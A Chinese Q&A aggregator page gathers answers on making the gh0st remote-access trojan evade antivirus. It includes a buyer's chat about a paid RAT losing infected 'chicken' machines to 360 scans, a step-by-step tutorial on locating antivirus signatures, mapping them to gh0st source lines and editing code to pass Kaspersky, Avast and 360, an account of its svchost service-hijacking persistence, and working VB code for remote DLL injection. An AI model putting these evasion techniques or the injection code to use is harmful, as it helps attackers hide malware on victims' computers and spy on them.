當前位置:首頁 » 操作系統 » gh0st源碼免殺

gh0st源碼免殺

發布時間: 2022-02-11 23:57:41

Ⅰ ghost遠控怎麼做免殺

這個軟體還是不錯的,至少能值30塊一個月
但人家賣三百就是誰錢多誰就拿 去喂他們這些狗吧
下面是我買了之後和客服的聊天記錄,誰想買的參考下

0 14:53:35
上線了,360也沒提示
但是用360殺毒快速掃描一下,就殺出來一個可疑啟動項
然後禁止自啟動,再重啟下就不上線了
回復
飯客客服 14:54:43
金牌還是鑽石
回復
0 14:55:59
鑽石
回復
0 14:56:16
殺完再重啟就不上線了
回復
飯客客服 14:56:47
知道了 會通知技術的
回復
0 14:58:10
謝謝了
買來還沒能用過
回復
飯客客服 14:58:30
不過雲你就不能用么
回復
飯客客服 14:58:39
那這么說我估計一個月你頂多能用10天
回復
0 14:59:43
不是,好不容易抓來雞一殺沒了
不是白忙活嗎
回復
0 15:18:32
您這意思是鑽石遠控一個月有20天不過360雲查殺?
回復
0 15:29:12
內網感染,無限復活什麼的不能用就無所謂了
關鍵最基本的免殺不行的話真不好說了
我買的是一個月的免殺,不是10天的
您能給退款嗎?
回復
0 16:13:59
能給個說法嗎?
回復
0 16:15:22
才剛買2天,退200就行
回復
飯客客服 16:56:55
有誰會每天去雲查殺啊,而且3天更新一次
回復
0 17:00:55
能退款不?
回復
飯客客服 17:02:57
沒有理由不能退款
回復
0 17:03:25
謝謝
至少你沒說任何情況都不能退
回復
飯客客服 17:05:14
只要理由充分,就可以退款
回復
0 17:07:51
我想買個免殺性好點的
所以才沒去買金牌

其他官網上寫的內網感染什麼的都不說了

飯客客服 14:58:39
那這么說我估計一個月你頂多能用10天

這條就夠了吧?退200就行,你也辛苦了
回復
飯客客服 17:08:20
你想買個,30天一直免殺的遠控,除非去定製個人版
回復
0 17:08:58
那官網上怎麼不寫上一個月內保證10天免殺呢?
回復

0 18:34:47

回復
飯客客服 18:34:46
[自動回復]買包年鑽石遠控送銅牌VIP~~最新優惠
回復
0 21:55:26

回復
飯客客服 21:55:27
[自動回復]我去吃飯了,一會再聯系。

Ⅱ 遠控源碼免殺需要什麼工具

遠控軟體gh0st源碼免殺

遠控軟體gh0st3.6開源了,開源意味著我們可以在此基礎上進行二次開發,同時也意味著殺軟可以較容易的查殺該款遠控木馬,既然要利用,我們就做好源碼基礎上的木馬免殺工作。

好久沒有來博客了,我把免殺這部分整理了一下,先拋一磚頭,有興趣的朋友可以接著做,也可以和本人交流。


gh0st遠控軟體採用驅動級RESSDT過主動,svchost參數啟動,替換系統服務的方式工作的,工作方式較為先進,美中不足的部分是沒有進行驅動級或用戶級隱藏,當然這部分可以添加進去。編碼利用了VC的編程環境。

一、環境配置
編譯環境一定要配置好:DDK+SDK+VC6,DDK用來編譯sys文件的,SDK+VC6是用來編譯工程的,配置部分比較簡單,網上有很多資料,這里不再詳述,有興趣的朋友也可以查看DDK和SDK的相關幫助。

二、特徵碼定位簡述
殺毒軟體查殺木馬的原理基本是根據特徵查殺的,被查殺的部分我們稱之為特徵碼,所以我們可以利用特徵碼定位工具MyCLL定位出病毒的特徵碼位置,定位工具原理是將被掃描木馬分塊,利用分段填充的方式,匹配殺軟的特徵值,找到殺軟查殺病毒的位置。
定位出特徵碼,如何反向找到源碼中的對應位置呢?請看下面分析,

三、二進制文件與源碼定位之map文件利用
map文件是二進制和源碼之間對應的一個映射文件。
我們假設根據第三步我們定位出了病毒的特徵碼:

病毒名稱 特徵碼位置 內存地址
svchost.dll 000038AA_00000002 100044AA
svchost.dll 00005F98_00000002

第一步設置VC編譯環境生成Map文件。
在 VC 中,點擊菜單「Project -> Settings」選項頁(或按下 Alt+F7),選擇 C/C++ 選項卡,並在最下面的 Project Options 裡面輸入:/Zd ,然後要點擊 Link 選項卡,選中「Generate mapfile」復選框,並在最下面的 Project Options 裡面輸入:/mapinfo:lines,表示生成 MAP 文件時,加入行信息。設置完成。

第二步編譯VC工程,設置活動工程編譯即可,這個不用說明。這個步驟完成後,在release(或debug)目錄,多了一個.map文件(比如svchost.map)。

第三步打開map文件(用UE或文本編輯器打開都行),形式如下:

(begin)
Timestamp is 488fcef2 (Wed Jul 30 10:16:18 2008)

Preferred load address is 10000000
---------------------------------------------------------------------------1----(為方便說明,wrw添加)
Start Length Name Class
0001:00000000 00010a50H .text CODE
0001:00010a50 00000485H .text$x CODE
0002:00000000 000004c8H .idata$5 DATA
......
0003:00000010 00000004H .CRT$XIZ DATA
0003:00000020 00001a50H .data DATA
0003:00001a70 00000688H .bss DATA
0004:00000000 000000a8H .rsrc$01 DATA
0004:000000b0 00000cf0H .rsrc$02 DATA

----------------------------------------------------------------------------2---(為方便說明,wrw添加)
Address Publics by Value Rva+Base Lib:Object

0001:00000000 ??0CAudio@@QAE@XZ 10001000 f Audio.obj
0001:000000d0 ??_GCAudio@@UAEPAXI@Z 100010d0 f i Audio.obj
0001:000000d0 ??_ECAudio@@UAEPAXI@Z 100010d0 f i Audio.obj
0001:000000f0 ??1CAudio@@UAE@XZ 100010f0 f Audio.obj
0001:000001e0 ?getRecordBuffer@CAudio@@QAEPAEPAK@Z 100011e0 f Audio.obj
0001:00000240 ?playBuffer@CAudio@@QAE_NPAEK@Z 10001240 f Audio.obj
0001:000002c0 ?InitializeWaveIn@CAudio@@AAE_NXZ 100012c0 f Audio.obj
......
0001:00003310 ?SendToken@CFileManager@@AAEHE@Z 10004310 f FileManager.obj
0001:00003320 ?UploadToRemote@CFileManager@@AAE_NPAE@Z 10004320 f FileManager.obj
0001:00003440 ?FixedUploadList@CFileManager@@AAE_NPBD@Z 10004440 f FileManager.obj
0001:00003670 ?StopTransfer@CFileManager@@AAEXXZ 10004670 f FileManager.obj
0001:00003730 ?CreateLocalRecvFile@CFileManager@@AAEXPAE@Z 10004730 f FileManager.obj

......
----------------------------------------------------------------------------3---(為方便說明,wrw添加)

Line numbers for ./Release/FileManager.obj(E:/vtmp/gh0st3src/Server/svchost/common/FileManager.cpp) segment .text

17 0001:00002630 20 0001:0000267f 21 0001:00002698 24 0001:000026d0
25 0001:000026f8 26 0001:0000273c 29 0001:000027d0 33 0001:000027ee
77 0001:000027f8 36 0001:000027fb 37 0001:00002803 77 0001:0000280d
......
532 0001:0000340f 534 0001:00003414 537 0001:00003428 540 0001:00003440
546 0001:0000345d 547 0001:00003487 548 0001:00003490 549 0001:00003492
551 0001:0000349e 552 0001:000034b8 553 0001:000034cb 554 0001:000034d4
558 0001:000034de 560 0001:000034e9 563 0001:000034ee 564 0001:00003506
......

(end)

我們看下,定位svchost.dll 的第一個特徵碼內存地址為:100044AA,在第2塊中,我們可以找到RVA+BASE與之很接近的是

0001:00003440 ?FixedUploadList@CFileManager@@AAE_NPBD@Z 10004440 f FileManager.obj

這樣我們可以定位到FileManager.cpp中的FixedUploadList函數,是不是范圍縮小了?
下面我們再縮小代碼行
利用這個公式:特徵碼行偏移 = 特徵碼地址(Crash Address)- 基地址(ImageBase Address)- 0x1000
看起來好像很難,其實很簡單,我們將100044AA去掉內存基址10000000,再減1000,因為PE很多從1000開始,可以得到代碼偏移地址為34AA。到第3塊中找對應的代碼行。
偏移地址34AA在(551 0001:0000349e 552 0001:000034b8 )中間,也就是551行和552行中間,我們到源程序中查找第551行:
wsprintf(lpszFilter, "%s%s*.*", lpPathName, lpszSlash);
這樣就定位出源代碼了,要怎麼修改就怎麼修改它就可以了。

四、實戰免殺
A、卡巴免殺
首次編譯後,先做卡巴的免殺。卡巴殺sys文件和dll,當然也就殺包裝它們的install.exe,最後卡巴還殺生成的sever,我這里說殺生成好的server不是和前面的特徵碼重疊的地方,而是殺配置信息。
第一步、sys免殺
sys重新編譯後,增加了輸入表的函數,同時系統不同,造成很多地方不同於原特徵,順利通過卡巴、金山、小紅傘等殺軟。
第二步、svchost.dll免殺
特徵碼定位MultiByteToWideChar和"gh0st update"兩個位置。這里是通過第3步map文件得出的。
卡巴怕加花指令, 這個函數MultiByteToWideChar的調用上,可以在這個函數前面隨便加幾句無效語句就可以通過卡巴殺軟。
字元串調用"gh0st update" ,這個是用於更新用的 ,如果不要在線更新,直接把這個語句所在代碼塊刪除;嘿嘿,其實搜索工程替換這個字元串為其他的字元串就可以了^_^,這個方法同時可以過金山殺軟。
第三步、server免殺
卡巴定位在最後的配置信息,採取跳轉顯然是不行的,採用加花的辦法,在寫入AAAAAA配置信息之前,隨便寫些東西,就可以做server免殺。
卡巴免殺完成!

B、Avast免殺
最新的avast殺軟再查殺1下,殺install.exe和svchost.dll(也就是殺生成的文件和其中的資源文件),接著做它的源碼免殺。
定位在特徵字元串%02d/%02d/%02d和「SYSTEM/CurrentControlSet/Services/%s」兩個地方。
解決方案:
1、svchost.dll的特徵碼定位在鍵盤記錄KeyboardManager.cpp文件中的SaveInfo(char *lpBuffer)函數。特徵字元串%02d/%02d/%02d,也就是我們看到鍵盤記錄的日期,修改之,修改的方法很多,將其改為[%d/%d/%d %d:%d:%d] ,編譯即可通過avast殺軟。
2、install的特徵碼定位在「SYSTEM/CurrentControlSet/Services/%s」,對應文件是install.cpp里的InstallService函數,修改大小寫,編譯即可通過免殺。

五、添加垃圾代碼的小方法
垃圾代碼要移動特徵碼所在的位置,不要跑到堆棧中了,這樣的代碼沒有用。可以採取添加for循環,做計數,簡單統計,採用局部變數,不改變後面的邏輯為宜。
添加輸出表的方法:
有殺輸出表的,可以在生成的svchost.dll上添加空函數 ,但是每次編譯都要修改1次資源 ,其實我們在源碼上添加如下語句:
extern "C" __declspec(dllexport) bool JustTempFun();//聲明
……
extern "C" __declspec(dllexport) bool JustTempFun() //實現
{
return false;
}
編譯後,輸出表就被改變了,有的殺軟就可做到代碼免殺。

六、gh0st自動生成6to4ex.dll的修改
看到好多站友提問自動生成6to4ex.dll的問題,有熱心站友也提出了自己的見解 ,我感覺有些人提出的解決方案不完全正確,有可能造成剛入手人誤解,我根據自己的理解說明1下。

gh0st服務端是通svchost -netsvcs啟動的,所以程序要利用netsvcs 服務,服務端也就是根據netsvcs生成的,故不能說服務端生成是隨機的,相對於大多數系統來講,基本是固定的,下面看分析。

查看install.cpp裡面的InstallService()方法,首先遍歷HKEY_LOCAL_MACHINE/SOFTWARE/ Microsoft/Windows NT/CurrentVersion/Svchost中的服務項,查找到一個服務後,程序採取替換服務的方法,將原服務刪除,然後生成對應服務項+ ex.dll的文件替換原服務,6to4服務一般排在第一位,6to4服務是一種自動構造隧道的方式,作用在於只需要一個全球惟一的IPv4地址便可使得整個站點獲得IPv6 的連接,這個服務對一般人來講,基本閑置,所以我們的程序就把6to4服務給替換掉,同時在windows/system32/目錄下生成 6to4ex.dll,以後啟動就是6to4ex了,如果把這個服務跳過去,就依次向下生成Ias、Iprip等服務啦,如果netsvcs項沒有可以替換的服務,則程序將自己添加1個服務,名稱就是由 AddsvchostService()方法產生的netsvcs_0x%d。

這樣說不知道關心服務名稱的明白了不?

這個不能說是技術問題,但是小技巧問題可以從這里產生,我不知道其他人的360是怎麼過的,但是我覺得可以提示1下的是,如果是360默認系統安全的服務,它肯定不會報不安全,替換閑置的系統安全的服務則通過360的效果要好的多

Ⅲ 易語言gh0st遠控源碼

ghost現在基本上都報毒,更新麻煩死了

Ⅳ 想做免殺遠控,通過修改現有的公開源碼好實現嗎

你說的不錯
現在免殺確實不好做了
源碼免殺不錯的,現在開源的遠控也有,個人覺得開源的gh0st不錯,你可以嘗試下gh0st是C寫的,看你的編程的底子了,我這還有編譯免殺的教程,要的話M我。
還有鴿子1.2的開源,delphi寫的,還有暗組的DRAT開源1.X的,還有其他的等等
要麼你自己寫一款也行,你要有技術的哦

Ⅳ gh0st源碼免殺怎麼過360安全衛士的提示

將上線信息的函數修改一下就行了。。

Ⅵ GHOST源碼免殺特徵碼我定位在DLL上

就看你是過什麼了,金山的GH0ST殺的很兇,不會匯編的源碼去改簡單,會匯編的直接扔到OD裡面,動態調用,好了,不多說了

Ⅶ gh0st遠控需要學C++還是VC++

gh0st遠控是用c++語言在vc++編譯器中編寫的, �0�2所以要學c++,免殺 �0�2好像還要用匯編修改吧,

Ⅷ Gh0st3.6 源碼中怎麼實現進程注入的

我寫過一個注入Dll的VB代碼,兩個參數,第一個是要注入的進程的PID,第二個是要注入的Dll的路徑。代碼如下(不加函數聲明……)Public Function FxRemoteProcessInsertDll(ByVal pid As Long, ByVal DllPath As String) As Long
Dim lpThreadAttributes As SECURITY_ATTRIBUTES
Dim hProcess, hThread As Long
Dim DllBuffer As Long
Dim DllFileSize As Long
Dim rReturn As Long
Dim fAddr As Long
Dim errNum As Long
Dim errStr As String

hProcess = FxNormalOpenProcess(PROCESS_ALL_ACCESS, pid)
'所需許可權PROCESS_QUERY_INFORMATION Or PROCESS_VM_OPERATION Or PROCESS_VM_READ Or PROCESS_VM_WRITE
If hProcess = 0 Then errStr = "打開進程失敗!": GoTo errors DllFileSize = LenB(StrConv(DllPath, vbFromUnicode)) + 1
DllBuffer = VirtualAllocEx(hProcess, 0, DllFileSize, MEM_RESERVE Or MEM_COMMIT, PAGE_READWRITE)
If DllBuffer = 0 Then errStr = "分配內存空間失敗!": GoTo errors rReturn = WriteProcessLongMemory(hProcess, DllBuffer, ByVal DllPath, DllFileSize, 0)
If DllBuffer = 0 Then errStr = "寫入內存失敗!": GoTo errors

fAddr = GetProcAddress(GetMoleHandle("kernel32.dll"), "LoadLibraryA")
hThread = CreateRemoteThread(hProcess, lpThreadAttributes, 0, fAddr, DllBuffer, 0, ByVal 0&)
If DllBuffer = 0 Then errStr = "載入Dll失敗!": GoTo errors

WaitForSingleObject hThread, INFINITE

'<——輸出調試信息——
errNum = GetLastError
Debug.Print "DllFileSize:" & DllFileSize & ",DllBuffer:" & FormatHex(DllBuffer) & ",hThread:" & hThread & ",errNum:" & errNum
'——————————>

VirtualFreeEx hProcess, DllBuffer, DllFileSize, MEM_DECOMMIT
ZwClose hProcess
ZwClose hThread

FxRemoteProcessInsertDll = 1
Exit Function
errors:
MsgBox errStr, 0, "錯誤"
FxRemoteProcessInsertDll = 0
End Function

Ⅸ 求gh0st3.75遠控的源碼程序,是遠控不是ghost 學慣用 找不到啊 最新的就是3.75吧 有官方網站嗎

3.75隻有服務端代碼,控制端的沒有開源。

Ⅹ 真有GHOST免殺嗎

ghost遠控怎麼做免殺 ...是Gh0st 不錯的遠控,有源碼下載懂源碼的話,可以源碼免殺,很不錯配置,就和普通遠控一樣啊 ...是Gh0st 不錯的遠控,有源碼...

熱點內容
excel緩存清除 發布:2024-11-15 00:39:53 瀏覽:486
機械鍵盤可編程 發布:2024-11-15 00:39:09 瀏覽:912
php判斷字元開頭 發布:2024-11-15 00:35:33 瀏覽:507
網易蘋果游戲怎麼轉移到安卓 發布:2024-11-15 00:07:52 瀏覽:270
win7php環境搭建 發布:2024-11-15 00:06:55 瀏覽:17
erpjava 發布:2024-11-14 23:52:23 瀏覽:253
電腦版地平線四怎麼連上伺服器 發布:2024-11-14 23:46:42 瀏覽:472
ios怎麼變安卓 發布:2024-11-14 23:46:36 瀏覽:333
win7共享xp列印機拒絕訪問 發布:2024-11-14 23:45:29 瀏覽:750
引起資源配置失效的原因有哪些 發布:2024-11-14 23:35:22 瀏覽:15